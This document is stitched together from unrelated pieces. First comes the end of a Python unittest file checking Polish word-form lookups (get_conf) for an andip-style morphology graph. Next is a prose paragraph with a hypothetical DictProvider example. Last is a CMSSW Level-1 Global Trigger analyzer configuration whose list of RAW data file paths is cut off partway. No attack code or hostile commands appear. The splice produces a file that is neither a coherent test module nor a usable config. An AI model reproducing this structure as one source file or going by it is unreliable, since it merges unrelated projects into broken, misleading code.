        self.assertIn(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'}), self.graph.get_conf('występują'))
        self.assertIn(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'trzecia'}), self.graph.get_conf('jest'))
        self.assertIn(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'}), self.graph.get_conf('są'))

    def testGetConfPreposition(self):
        self.assertIn(('przyimek', 'z', {'forma': 'z'}), self.graph.get_conf('z'))
        self.assertIn(('przyimek', 'z', {'forma': 'ze'}), self.graph.get_conf('ze'))

    def testGetConfAdjective(self):
        self.assertIn(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'm'}), self.graph.get_conf('opisane'))
        self.assertIn(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'ż'}), self.graph.get_conf('opisane'))

    def testGetConfNoun(self):
        self.assertIn(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'pojedyncza'}), self.graph.get_conf('znaku'))
        self.assertIn(('rzeczownik', 'znak', {'przypadek': 'mianownik', 'liczba': 'pojedyncza'}), self.graph.get_conf('znak'))
        self.assertIn(('rzeczownik', 'znak', {'przypadek': 'mianownik', 'liczba': 'mnoga'}), self.graph.get_conf('znaki'))
if __name__ == '__main__':
    # import sys; sys.argv = ['', 'Test.test']
    unittest.main()
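The tests above all exercise one convention: `get_word` maps a `(part_of_speech, lemma, attributes)` triple to an inflected form, and `get_conf` inverts that mapping. A minimal stand-in (hypothetical `DictProvider`, not part of andip) illustrating the round-trip contract that both the file oracle and the graph provider must satisfy:

```python
# Hypothetical in-memory provider mirroring the andip get_word/get_conf contract.
class DictProvider:
    def __init__(self, entries):
        # entries: list of ((pos, lemma, attrs_dict), inflected_word) pairs
        self._entries = entries

    def get_word(self, conf):
        # Forward lookup: configuration triple -> inflected form (or None).
        for known_conf, word in self._entries:
            if known_conf == conf:
                return word
        return None

    def get_conf(self, word):
        # Inverse lookup: inflected form -> all matching configurations.
        return [conf for conf, w in self._entries if w == word]

provider = DictProvider([
    (('przyimek', 'z', {'forma': 'z'}), 'z'),
    (('przyimek', 'z', {'forma': 'ze'}), 'ze'),
])
print(provider.get_word(('przyimek', 'z', {'forma': 'ze'})))  # prints: ze
```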
# L1Trigger/GlobalTriggerAnalyzer/test/L1GtDataFromRawEmulAnalyzer_cfg.py
# from the PKUfudawei/cmssw repository (Apache-2.0 license)
#
# cfg file for:
#
# Unpack the GCT, GMT and GT data.
# Run the L1 GT emulator on the unpacked GCT and GMT data.
# Compare the GT data records with the GT emulated records
#
import FWCore.ParameterSet.Config as cms
process = cms.Process("RunL1GtDataFromRawEmulAnalyzer")
# number of events and source
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(5000)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/afs/cern.ch/user/g/ghete/scratch0/CmsswTestFiles/testGt_DataFromRawEmulAnalyzer_source.root')
)
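The `maxEvents` block above caps the job at 5000 events. A one-line sketch (assuming the same `cms` parameter-set semantics used in this file; `-1` is the CMSSW convention for "no limit") of lifting that cap for a full run:

```python
# Process all events in the input files instead of the first 5000.
process.maxEvents.input = cms.untracked.int32(-1)
```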
process.PoolSource.fileNames = ['/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/003AD0A3-B51C-DD11-834F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/020DA07C-9C1C-DD11-8B5C-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/026FFDE2-B71C-DD11-9D4A-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/028925DF-A61C-DD11-BDF1-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0401CDA0-A01C-DD11-9BDB-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0414D38E-9E1C-DD11-A7E5-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/04F62EBD-B91C-DD11-BB9C-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0696D1C9-A41C-DD11-A411-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A052134-AF1C-DD11-8919-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A60D7DC-A41C-DD11-9075-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A637587-B31C-DD11-B32A-000423D996C8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A71AABE-A21C-DD11-A9A1-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C3D3FB1-B11C-DD11-9B38-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C4A72B9-B91C-DD11-8A6F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C60F77C-9C1C-DD11-BC75-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C87A74D-9A1C-DD11-A29B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E34B872-9C1C-DD11-8208-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E8A89B0-B91C-DD11-8EBA-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0EF363E9-A61C-DD11-B75F-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/105F2C89-9E1C-DD11-9D86-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1211D927-B81C-DD11-91B3-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/121EDD5E-B11C-DD11-AEDE-001D09F23E53.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/12464707-A91C-DD11-B478-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/127649CF-A41C-DD11-B170-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/146566AE-B71C-DD11-A113-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1483D99C-B51C-DD11-9274-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/148AB865-B11C-DD11-8B3F-001D09F24E39.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14B76514-AB1C-DD11-BEFA-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14E55CBD-B91C-DD11-A876-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14F7A391-A01C-DD11-9D9E-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1607D3A0-A01C-DD11-9223-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/16673A21-B81C-DD11-8D6F-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/18096B2D-AF1C-DD11-A2A2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/189AC9C5-A41C-DD11-868A-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1A9B278C-A01C-DD11-842F-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1AD12186-9E1C-DD11-815A-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C240A80-9E1C-DD11-99DD-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C7DCBDA-A61C-DD11-BFCA-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E24F97C-9C1C-DD11-8921-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E9EE338-9A1C-DD11-987A-000423D6A6F4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2021DDD2-A41C-DD11-AAF1-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2064C823-AD1C-DD11-B86F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20675D3E-AF1C-DD11-B97D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2072E22E-981C-DD11-B7A0-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/209E2E2B-AB1C-DD11-8B0F-000423DC1A0C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20DFF4BD-A21C-DD11-AAE4-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2201A985-9E1C-DD11-B808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22718B76-9C1C-DD11-95E1-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/228D717C-9E1C-DD11-B614-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22B6FAD7-A41C-DD11-9238-001617DF785A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/242FCD06-AB1C-DD11-8213-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2445DE33-981C-DD11-A43B-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/26B69B96-A01C-DD11-8FC4-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2812BEEF-B71C-DD11-8F46-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A2CCCA0-A01C-DD11-93B9-001617DBD556.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A59E006-A91C-DD11-A82B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2AB8E6D7-A41C-DD11-9CE5-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2C6D88A5-B51C-DD11-82E3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2CA386B3-B91C-DD11-BDE5-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E3E1A3E-9A1C-DD11-A7CE-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E9DA8C2-B91C-DD11-8DE2-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32D12786-9E1C-DD11-847B-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FB38BC-B91C-DD11-A8E5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FD88CF-A41C-DD11-BB80-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3465F6A3-B71C-DD11-814D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36588B7A-B11C-DD11-8EF1-001D09F24024.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/368E861F-B81C-DD11-B1B3-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36B9546B-B41C-DD11-9F3D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36D22616-AB1C-DD11-BFCF-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/382BA240-AF1C-DD11-AF9F-000423D94C80.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AA50549-9A1C-DD11-AABD-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AD70FB4-A21C-DD11-8A63-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3ADAADE1-A61C-DD11-B2AA-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C096D93-A01C-DD11-B602-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C87B1E8-A61C-DD11-A4F2-000423D996C8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3CCC829C-A01C-DD11-ACDF-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E22AFBB-A21C-DD11-AB9B-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E7BB98C-A01C-DD11-91C0-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/400B2EDA-A61C-DD11-B40A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/403705CF-A41C-DD11-A0CC-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/40A83AB4-B91C-DD11-9009-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/426D436B-9C1C-DD11-9397-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42E7BF93-A01C-DD11-B183-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42FFA897-A01C-DD11-BD31-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/442D1EDA-A41C-DD11-99E7-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BA378D-A01C-DD11-A315-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BB2D77-9C1C-DD11-BB5A-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/462E23DA-A61C-DD11-8BB4-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48626E2D-AF1C-DD11-AC76-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48746689-9E1C-DD11-8636-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/487B3F93-A01C-DD11-9494-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4888D793-A01C-DD11-8015-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48C529D3-A41C-DD11-A339-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48CED0AD-B51C-DD11-90F8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4A251384-9E1C-DD11-ABCC-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CB2CE88-B31C-DD11-AFB6-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CC3CE79-B11C-DD11-9EDA-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4EFE256E-9C1C-DD11-BB71-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F6304D-9A1C-DD11-B404-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F86B89-9E1C-DD11-A8AF-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52756844-9A1C-DD11-8D8D-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52E7ECA0-B51C-DD11-BB37-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52F22F7D-B31C-DD11-A927-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/54387CBD-A21C-DD11-948C-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5689BB7C-9C1C-DD11-814E-001617C3B706.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/569DD041-9A1C-DD11-998E-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/56A0A3E6-A61C-DD11-9903-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/584C9F03-A91C-DD11-B7CF-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/589FD448-9A1C-DD11-987B-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58D1F7BD-A21C-DD11-868A-001617E30D12.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58FE98E6-A61C-DD11-8D9F-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5AC19AC4-A21C-DD11-9156-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5CC7329E-B51C-DD11-9263-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5E91438D-9E1C-DD11-84C5-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5EF53351-B81C-DD11-A03E-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/609D941F-AD1C-DD11-9C31-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60D31125-B81C-DD11-BA96-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60F55A71-9C1C-DD11-B2A5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/62815270-B31C-DD11-8D5F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6286A3CE-A41C-DD11-B778-000423D6CA6E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628AC3E4-A61C-DD11-B825-000423D99658.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628C32BE-A21C-DD11-BF26-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64870171-9C1C-DD11-9446-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64C37396-A01C-DD11-AC51-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66382D71-B31C-DD11-A1EC-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66A011A1-A01C-DD11-BB03-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66BF7047-9A1C-DD11-9E11-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66C6BFDF-A61C-DD11-B38A-000423D94C68.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68CADF33-AF1C-DD11-B816-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68F15475-B31C-DD11-9003-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A447F52-B11C-DD11-ADF5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A81039D-A01C-DD11-AB8C-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6ADDF69C-B51C-DD11-AACF-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C22E3A6-A01C-DD11-BF27-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C2A4D97-B11C-DD11-8199-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6CA70D49-9A1C-DD11-A02B-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6E3BEBE1-A61C-DD11-864F-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6EDB6407-A91C-DD11-B38D-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/701CC33D-9A1C-DD11-86A0-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70D54482-B11C-DD11-8967-001D09F26C5C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70FFC09B-B51C-DD11-B3E3-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/724E9A61-B11C-DD11-BD5E-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/72500CBD-B91C-DD11-9808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740C169F-B51C-DD11-B13D-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740ECA5B-B11C-DD11-B2E9-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A18258-AF1C-DD11-95C3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A67AE1-A61C-DD11-BA54-000423D8FA38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74F4C19C-B51C-DD11-8E0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7603B179-9C1C-DD11-B7D4-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76867668-9C1C-DD11-B5ED-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76B197DF-A61C-DD11-B053-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7851BF3D-981C-DD11-98DE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7871E4B3-B91C-DD11-9810-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78A51442-9A1C-DD11-82CE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78B68EE6-A61C-DD11-982C-000423D94A20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7AB72EDA-A61C-DD11-93AE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7C0BF6D7-B31C-DD11-A632-000423D9517C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7E311039-981C-DD11-8455-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80313A1F-B81C-DD11-BCAE-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80345FC4-A41C-DD11-AA4B-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8070C7DF-B71C-DD11-ADA3-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/822E46C5-A21C-DD11-92FE-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84267891-A01C-DD11-AC5E-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8482A33A-981C-DD11-BA59-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/848D9EC2-B91C-DD11-BD85-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84F6D348-9A1C-DD11-AC69-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84FD6FDF-A61C-DD11-9A4C-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/865955BE-A21C-DD11-8B6B-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B628BD-B91C-DD11-B16E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B85B3E-9A1C-DD11-8459-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86E278C3-B91C-DD11-9EBB-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A5F9D3D-9A1C-DD11-B194-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A8B30DD-A41C-DD11-A07F-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8AADB270-B31C-DD11-938C-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C25D448-9A1C-DD11-BAA5-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C52216F-B31C-DD11-82EA-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8CAD26DA-A61C-DD11-AE7E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E592FC0-B91C-DD11-A920-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E70E876-9C1C-DD11-84BE-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E896B1E-B81C-DD11-B712-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA513BB-A21C-DD11-97DE-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA8A0ED-A81C-DD11-A65A-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EB8255F-B11C-DD11-B3D7-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EF6EF7C-B31C-DD11-B02E-000423D98EC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904AB138-9A1C-DD11-B0C7-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904C3593-A01C-DD11-BCCC-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9066B967-9C1C-DD11-BB3B-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9067ACE6-A61C-DD11-B578-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/90823880-B11C-DD11-A6BF-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909250C9-A41C-DD11-8F66-000423D6B444.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909962C1-A21C-DD11-A255-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9262E0B9-A21C-DD11-BDED-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9272C5EB-A81C-DD11-88D5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9449765E-B11C-DD11-B99D-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94AE4A9E-B51C-DD11-A5FE-001617C3B76A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94C8DE6D-9C1C-DD11-98FE-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/965BD87C-B31C-DD11-BCB0-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/96613A1F-B81C-DD11-B8A8-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98315DBA-B91C-DD11-A70D-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9837D448-9A1C-DD11-99DC-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98577A34-981C-DD11-B699-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/987C6A38-981C-DD11-A3EB-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98F26DFE-A81C-DD11-B151-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9A9188C9-A41C-DD11-ADA5-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C33A87C-9C1C-DD11-9622-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C52E338-9A1C-DD11-BF41-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CBEB742-AF1C-DD11-91F0-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CC04B90-9E1C-DD11-B8DC-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9E8233A0-B51C-DD11-9222-001617DBD316.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A02EB8EA-A61C-DD11-A112-000423D99AA2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0A2198F-A01C-DD11-93EA-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E37787-B31C-DD11-8321-000423D94990.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E807CF-A41C-DD11-BB21-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A216CE55-AF1C-DD11-88F0-000423D98B28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A451701D-B81C-DD11-8258-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4586FA1-AB1C-DD11-BDF3-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4AD6A85-B31C-DD11-B9A7-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A6CA6BC4-A41C-DD11-A31B-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A87757E1-A61C-DD11-AF56-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A8E6BAB3-A21C-DD11-A4ED-000423D992A4.root',
